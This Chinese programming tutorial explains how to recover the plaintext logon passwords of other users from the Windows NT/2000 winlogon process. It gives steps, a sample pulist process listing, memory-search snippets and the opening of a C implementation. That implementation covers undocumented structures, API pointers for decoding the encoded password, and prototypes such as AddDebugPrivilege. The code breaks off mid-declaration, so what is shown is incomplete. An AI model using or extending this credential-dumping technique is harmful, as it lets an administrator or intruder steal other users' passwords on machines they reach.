VisualC++信息安全编程(5)获取windows登陆账户密码
Windows Logon Process,Windows NT 用户登陆程序,管理用户登录和退出。因为登陆的域名和用户名是明文存储在winlogon进程里的,而Password是限定了查找本进程用户的密码
<167-174: GetEnvironmentVariableW(L"USERNAME", UserName, 0x400);
GetEnvironmentVariableW (L"USERDOMAIN", UserDomain, 0x400);
>,然后到winlogon进程的空间中查找UserDomain和UserName < 590:// 在WinLogon的内存空间中寻找UserName和DomainName的字符串
if ((wcscmp ((wchar_t *) RealStartingAddressP, UserName) == 0)
&&
(wcscmp ((wchar_t *) ((DWORD) RealStartingAddressP + USER_DOMAIN_OFFSET_WIN2K), UserDomain) == 0))
> ,找到后就查后边的加密口令。
其实只要你自己指定用户名和winlogon进程去查找就行了,只要你是管理员,任何本机用msgina.dll图形登陆的用户口令都可以找到。
1. pulist,找到系统里登陆的域名和用户名,及winlogon进程id
2. 然后给每个winlogon进程id查找指定的用户就行了。
example:
C:\Documents and Settings\bingle>pulist
Process PID User
Idle 0
System 8
smss.exe 164 NT AUTHORITY\SYSTEM
csrss.exe 192 NT AUTHORITY\SYSTEM
winlogon.exe 188 NT AUTHORITY\SYSTEM
wins.exe 1212 NT AUTHORITY\SYSTEM
Explorer.exe 388 TEST-2KSERVER\Administrator
internat.exe 1828 TEST-2KSERVER\Administrator
conime.exe 1868 TEST-2KSERVER\Administrator
msiexec.exe 1904 NT AUTHORITY\SYSTEM
tlntsvr.exe 1048 NT AUTHORITY\SYSTEM
taskmgr.exe 1752 TEST-2KSERVER\Administrator
csrss.exe 2056 NT AUTHORITY\SYSTEM
winlogon.exe 2416 NT AUTHORITY\SYSTEM
rdpclip.exe 2448 TEST-2KSERVER\clovea
Explorer.exe 2408 TEST-2KSERVER\clovea
internat.exe 1480 TEST-2KSERVER\clovea
cmd.exe 2508 TEST-2KSERVER\Administrator
ntshell.exe 368 TEST-2KSERVER\Administrator
ntshell.exe 1548 TEST-2KSERVER\Administrator
ntshell.exe 1504 TEST-2KSERVER\Administrator
csrss.exe 1088 NT AUTHORITY\SYSTEM
winlogon.exe 1876 NT AUTHORITY\SYSTEM
rdpclip.exe 1680 TEST-2KSERVER\bingle
Explorer.exe 2244 TEST-2KSERVER\bingle
conime.exe 2288 TEST-2KSERVER\bingle
internat.exe 1592 TEST-2KSERVER\bingle
cmd.exe 1692 TEST-2KSERVER\bingle
mdm.exe 2476 TEST-2KSERVER\bingle
taskmgr.exe 752 TEST-2KSERVER\bingle
pulist.exe 2532 TEST-2KSERVER\bingle
具体实现代码如下
#include <windows.h>
#include <tchar.h>
#include <stdio.h>
#include <stdlib.h>
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
// Undocumented typedef's
typedef struct _QUERY_SYSTEM_INFORMATION
{
DWORD GrantedAccess;
DWORD PID;
WORD HandleType;
WORD HandleId;
DWORD Handle;
} QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION;
typedef struct _PROCESS_INFO_HEADER
{
DWORD Count;
DWORD Unk04;
DWORD Unk08;
} PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER;
typedef struct _PROCESS_INFO
{
DWORD LoadAddress;
DWORD Size;
DWORD Unk08;
DWORD Enumerator;
DWORD Unk10;
char Name [0x108];
} PROCESS_INFO, *PPROCESS_INFO;
typedef struct _ENCODED_PASSWORD_INFO
{
DWORD HashByte;
DWORD Unk04;
DWORD Unk08;
DWORD Unk0C;
FILETIME LoggedOn;
DWORD Unk18;
DWORD Unk1C;
DWORD Unk20;
DWORD Unk24;
DWORD Unk28;
UNICODE_STRING EncodedPassword;
} ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO;
typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD);
typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD);
typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID);
typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID);
typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING);
// Private Prototypes
BOOL IsWinNT (void);
BOOL IsWin2K (void);
BOOL AddDebugPrivilege (void);
DWORD FindWinLogon (void);
BOOL LocatePasswordPageWinNT (DWORD, PDWORD);
BOOL LocatePasswordPageWin2K (DWORD, PDWORD);
void DisplayPasswordWinNT (void);
void DisplayPasswordWin2K (void);
// Global Variables
PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation;
PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer;
PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation;
PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer;
PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString;
DWORD PasswordLength = 0;
PVOID RealPasswordP = NULL;
PVOID
补充:综合编程 , 安全编程 ,
